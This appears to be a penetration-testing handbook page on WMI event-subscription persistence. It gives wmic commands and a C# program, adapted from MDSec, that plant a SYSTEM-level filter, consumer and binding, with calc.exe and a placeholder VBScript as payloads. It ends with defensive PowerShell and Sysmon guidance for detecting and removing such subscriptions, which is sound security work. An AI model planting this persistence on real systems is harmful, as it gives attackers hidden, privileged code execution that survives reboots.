# WMI Event Subscriptions

WMI event subscriptions can be abused for persistence: the payload runs with SYSTEM privileges. WMI eventing can trigger an action on almost any system event, including logons, registry changes and file activity.

There are three components to remember about a WMI event subscription:

1. EventFilter: the event that triggers the payload
2. EventConsumer: where the payload is stored (what actually runs)
3. FilterToConsumerBinding: binds the “EventFilter” to the “EventConsumer”

This can be done with the wmic utility:

```
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="INFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="Select * From __InstanceCreationEvent Within 15 Where (TargetInstance Isa 'Win32_Process' And TargetInstance.Name = 'notepad.exe')"
```

The above command creates the EventFilter: it fires when a new instance of x32 notepad.exe appears in memory.

```
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="NAME", ExecutablePath="C:\Windows\System32\calc.exe",CommandLineTemplate="C:\Windows\System32\calc.exe"
```

The above command creates the EventConsumer, i.e. what runs (here calc.exe) when notepad.exe is executed.

```
wmic /NAMESPACE:"\\root\subscription" PATH FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"INFilter\"", Consumer="CommandLineEventConsumer.Name=\"NAME\""
```

The above command binds the “EventFilter” to the “EventConsumer”, which achieves persistence every time an instance of x32 notepad is executed.

If we run x32 notepad, we will see an instance of calc being run with SYSTEM privileges.

We can also implement this in other languages, for example C# (taken from MDSec's WMIPersistence):

```
// Adapted from: https://github.com/mdsecactivebreach/WMIPersistence/blob/master/WMIPersist.cs
using System;
using System.Text;
using System.Management;   // requires a reference to System.Management.dll

namespace WMIPersistence
{
    class Program
    {
        static void Main(string[] args)
        {
            PersistWMI();
        }

        static void PersistWMI()
        {
            ManagementObject myEventFilter = null;
            ManagementObject myEventConsumer = null;
            ManagementObject myBinder = null;

            // Payload: the VBScript the ActiveScriptEventConsumer will run, supplied base64-encoded
            string vbscript64 = "<INSIDE base64 encoded VBS here>";
            string vbscript = Encoding.UTF8.GetString(Convert.FromBase64String(vbscript64));
            try
            {
                // All three objects live in the root\subscription namespace
                ManagementScope scope = new ManagementScope(@"\\.\root\subscription");

                // 1. EventFilter: fires when a new notepad.exe process appears (polled every 5 seconds)
                ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
                String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
                                  "WHERE TargetInstance ISA \"Win32_Process\" " +
                                  "AND TargetInstance.Name = \"notepad.exe\"";

                WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
                myEventFilter = wmiEventFilter.CreateInstance();
                myEventFilter["Name"] = "demoEventFilter";
                myEventFilter["Query"] = myEventQuery.QueryString;
                myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
                myEventFilter["EventNameSpace"] = @"\root\cimv2";
                myEventFilter.Put();
                Console.WriteLine("[*] Event filter created.");

                // 2. EventConsumer: an ActiveScriptEventConsumer holding the VBScript payload
                myEventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
                myEventConsumer["Name"] = "BadActiveScriptEventConsumer";
                myEventConsumer["ScriptingEngine"] = "VBScript";
                myEventConsumer["ScriptText"] = vbscript;
                myEventConsumer.Put();
                Console.WriteLine("[*] Event consumer created.");

                // 3. FilterToConsumerBinding: ties the filter to the consumer (relative WMI paths)
                myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
                myBinder["Filter"] = myEventFilter.Path.RelativePath;
                myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
                myBinder.Put();
                Console.WriteLine("[*] Subscription created");
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            } // END CATCH
            Console.ReadKey();
        } // END FUNC
    } // END CLASS
} // END NAMESPACE
```
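Both the wmic sequence and the C# program above leave the same three objects in root\subscription. The following PowerShell, an added example that is not the handbook's or MDSec's code, shows how a defender enumerates them, resolves each binding to its trigger query and consumer action, and removes a confirmed pair. The function names are assumptions of this example; it assumes an elevated PowerShell 3+ session with the CIM cmdlets available.

```powershell
# Added example, not part of the handbook: enumerate persistent WMI subscriptions and
# resolve each binding to its trigger (filter query) and its action (consumer).
# Assumes an elevated PowerShell 3+ session with the CIM cmdlets (Get-/Remove-CimInstance).
$ns = 'root\subscription'
function Get-RefName($ref) {
    # Binding properties are references: CIM cmdlets expose them as objects with a Name,
    # older WMI output stores them as a path string such as __EventFilter.Name="INFilter".
    if ($ref -is [string]) { return ($ref -replace '.*Name="([^"]*)".*', '$1') }
    return $ref.Name
}
function Get-WmiSubscriptionBinding {
    $filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer  # all consumer subclasses
    $bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding
    foreach ($b in $bindings) {
        $filterName   = Get-RefName $b.Filter
        $consumerName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $filterName
        $c = $consumers | Where-Object Name -eq $consumerName
        $class = $c.CimClass.CimClassName
        # Only these two consumer classes execute arbitrary code; show exactly what they would run
        $action = switch ($class) {
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)" }
            'ActiveScriptEventConsumer' { "$($c.ScriptingEngine): $($c.ScriptText)" }
            default                     { "(no code execution: $class)" }
        }
        [pscustomobject]@{
            Binding    = "$filterName -> $consumerName"
            Namespace  = $f.EventNamespace
            Query      = $f.Query
            Action     = $action
            # Windows ships one benign pair by default: 'SCM Event Log Filter' -> NTEventLogEventConsumer
            Suspicious = $class -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'
        }
    }
}
function Remove-WmiSubscription([string]$FilterName, [string]$ConsumerName) {
    # Remove the binding first, then the filter and consumer it referenced
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { (Get-RefName $_.Filter) -eq $FilterName -and (Get-RefName $_.Consumer) -eq $ConsumerName } |
        Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventFilter   | Where-Object Name -eq $FilterName   | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer | Where-Object Name -eq $ConsumerName | Remove-CimInstance
}
Get-WmiSubscriptionBinding | Format-List
```

Sysmon event IDs 19, 20 and 21 record creation of the filter, consumer and binding respectively, which gives the same visibility at the moment the subscription is planted rather than on a later sweep. Once a pair is confirmed malicious, `Remove-WmiSubscription -FilterName 'INFilter' -ConsumerName 'NAME'` removes the objects created by the wmic commands above.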

## Resources

- [Persistence – WMI Event Subscription (Pentest Lab)](https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/)
- [MDSec WMIPersistence: WMIPersist.cs](https://github.com/mdsecactivebreach/WMIPersistence/blob/master/WMIPersist.cs)
